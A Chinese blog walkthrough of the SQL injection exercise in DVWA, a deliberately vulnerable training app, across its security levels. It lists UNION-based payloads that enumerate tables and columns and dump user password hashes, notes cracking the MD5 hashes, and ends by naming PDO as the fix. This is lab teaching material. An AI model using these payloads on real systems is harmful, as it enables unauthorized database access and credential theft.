dvwa之SQL Injection

dvwa之SQL Injection

Security Level: low

由源代码可知,对字符串没有进行任何过滤

输入

1' and 1=1#


输入

1' and 1=2#


判断字段数

1' order by 2# 

1' order by 3#


由此判断字段数为2

查用户及数据库

1' union select user(),database()#


查dvwa下的表

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa')#


查users表下的字段

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#


查user和password的值

1' union select 1,(select group_concat(user,password) from dvwa.users)#


密码使用了md5加密,我们随便找个md5解密网站进行解密

Security Level: medium

由源代码可知,这里对我们输入的id做了过滤处理,会将我们输入的单引号给转义掉,所以这里只能是数字型注入或者为宽字节注入

输入1,返回了结果,但是url没有回显我们输入的id,因为输入的1是以POST方式传了上去,这里使用google扩展工具hackbar抓取POST内容进行注入

判断是否有注入点


可以看到存在注入点

判断字段数


可以判断字段数为2

查用户和数据库

查dvwa下的表

查users下的字段

#这里使用0x7573657273是因为单引号被转义了,0x7573657273是users的十六进制结果
查user,password的值

Security Level: high

这里输入ID值会自动跳转到另一个页面,防止了自动化的SQL注入,查看源码可知,在sql语句后面加了个limit函数,这里依然可以用#把他注释掉,然后跟low等级就是一样的

查用户和数据库

1' union select user(),database()#


查dvwa下面的表

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa')#


查users下的字段

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#


查user,password的值

1' union select 1,group_concat(user,password) from dvwa.users#

Security Level: impossible

分析源码可以看到使用了PDO技术,杜绝了SQL注入

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值